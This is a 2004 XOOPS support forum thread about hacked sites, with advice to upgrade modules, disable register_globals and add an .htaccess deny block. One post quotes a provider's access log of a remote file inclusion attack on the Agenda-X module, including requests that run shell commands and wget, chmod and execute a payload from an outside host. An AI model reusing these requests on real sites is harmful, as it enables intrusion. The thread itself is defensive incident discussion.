My site got hacked... [Xoops 2.0 Bug Report] - XOOPS Web Application System

XOOPS

Forum

Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk

1

My site got hacked...

2004/2/23 8:30
Anonymous
Posts: 0
Since:

I've been using XOOPS for a while now on my site and for some reason just recently my site was completely hacked. My host is looking into the issue and trying to discover who and where it came from. But the problem remains that even after I changed all my passwords, the hacker later entered into my site and deleted everything. The only thing I can think of is that they got the password from mainfile.php by some sort of vulnerability perhaps with the script? Is there any known security vulnerability I should know about and waht do I need to do to make sure this never happens again. I've been using 2.0.5

2

Re: My site got hacked...

2004/2/23 11:00
irmtfan
Module Developer
Posts: 3419
Since: 2003/12/7

in mainfile.php could find only database info:

username

userpass

database name

u must set permission for mainfile.php to 444 ( read only )

but it seems that the hacker find the pass & delete database?

is this happened???

3

Re: My site got hacked...

2004/2/23 13:16
DonXoop
Posts: 1171
Since: 2003/11/27

Did they hack it by altering the configs or overwriting the files? If they overwrote files than mainfile.php is not the problem since they didn't do any XOOPS admin functions. They simply had file access. That means they either had FTP access or shell access on the server. Time to change host providers.

4

Re: My site got hacked...

2004/2/23 13:32
bassyard
Not too shy to talk
Posts: 157
Since: 2003/10/5

My site was hacked today too, I just received a mail from my provider, it seems that somebody was trying to hack the Agenda-X module. My provider has locked it until we sort out the problem... I'll post the log files later today (I'm @ work now)

Anybody who suffered the same problem??

Greetz B.

5

Re: My site got hacked...

2004/2/23 13:38
bassyard
Not too shy to talk
Posts: 157
Since: 2003/10/5

Here's the log file that my provider send me:

Quote:

We did have to deactivate your /content/modules/agendax/... scripts since it has been abused
by hackers. Please find the logfiles below.
Please DO NOT REACTIVATE the script until you have found a solution to
this security-bug in the script and update us on any of your actions.

www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:53:28 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=id;uname%20-a HTTP/1.1" 200 822 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:54:46 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=id;uname%20-a HTTP/1.1" 200 822 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:55:30 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;cd%20/tmp/;ls HTTP/1.1" 200 2806 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:56:05 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;cd%20/tmp/;wget%20www.crookies.hpg.com.br/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 702 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:56:58 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=pwd HTTP/1.1" 200 742 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:57:36 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;%20cd%20/usr/local/psa/home/vhosts/pressurelab.com/httpdocs/;ls;touch%20aa.txt HTTP/1.1" 200 1037 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

btw my site: www.pressurelab.com

6

Re: My site got hacked...

2004/2/23 13:39
Jan304
Official Support Member
Posts: 520
Since: 2002/3/31

Again people, why do you think there is something like an update? XOOPS 2.0.5 has an security flaw in the mylinks module (as said in that post, URGENT UPDATE).

So people, if there comes an upgrade, this is most of the times for something... And about the Agenda-x module, there was a security flaw till version 1.2.3. Please download the lastest secure version here.

7

Re: My site got hacked...

2004/2/23 13:42
bassyard
Not too shy to talk
Posts: 157
Since: 2003/10/5

Jan304:

I'm running XOOPS 2.0.6 so there's no problem there,

But I'll check for that Aganda-X update when I get home...

Thanx

8

Re: My site got hacked...

2004/2/23 13:43
DonXoop
Posts: 1171
Since: 2003/11/27

Agenda-X is the other problem if you are not at 1.2.4. Two things, upgrade to the latest and turn register_globals Off in php.ini. If the provider won't do that or allow .htaccess files so you can do it yourself than time to change providers.

I've had dozens of attempts to hack agenda-x and other things. They get nowhere so far. Don't go light on security.

9

Re: My site got hacked...

2004/2/23 13:46
bassyard
Not too shy to talk
Posts: 157
Since: 2003/10/5

Quote:

DonXoop wrote:
Agenda-X is the other problem if you are not at 1.2.4. Two things, upgrade to the latest and turn register_globals Off in php.ini. If the provider won't do that or allow .htaccess files so you can do it yourself than time to change providers.

I've had dozens of attempts to hack agenda-x and other things. They get nowhere so far. Don't go light on security.

Thanx DonXoop I'll try it tonight... I've got a real good provider, so I'm sure I can fix it

10

Re: My site got hacked...

2004/2/23 13:55
DonXoop
Posts: 1171
Since: 2003/11/27

Here's a little bit I add to the /modules/agenda-x/.htaccess file. It turns off register_globals (they are off at the server level but this makes sure), and it traps direct attempts at files called by the crackers.

Quote:

php_value register_globals 0

<files addevent.inc.php>
Order Deny,Allow
Deny from all
</files>

<files i18n.php>
Order Deny,Allow
Deny from all
</files>

<files config.inc.php>
Order Deny,Allow
Deny from all
</files>

<files admin/admin_header.php>
Order Deny,Allow
Deny from all
</files>

Login

Username

Password

Remember me

Register now! | Lost Password?

Search

Advanced Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

3/16 2:02 Mamba
Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

3/14 20:34 hnn_gerd
Re: NewBB v 5.1.0 b 6

3/7 12:07 Mamba
Re: NewBB v 5.1.0 b 6

2/23 2:57 Mamba
NewBB v 5.1.0 b 6

2/17 18:57 spierrard
Re: XOOPS 2.5.11 search user is not working

2/14 13:11 Mamba
Re: oledrion

2/14 11:29 Mamba
Re: oledrion

2/13 15:22 oswaldo
Re: oledrion

2/12 19:20 Mamba
Re: oledrion

2/12 16:02 oswaldo

Who's Online

236 user(s) are online (161 user(s) are browsing Support Forums)

Members: 0

Guests: 236

Donat-O-Meter

Stats
Goal:	$100.00
Due Date:	Apr 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}

{{ record.commit.author.name }} {{ record.commit.author.date | formatDate }}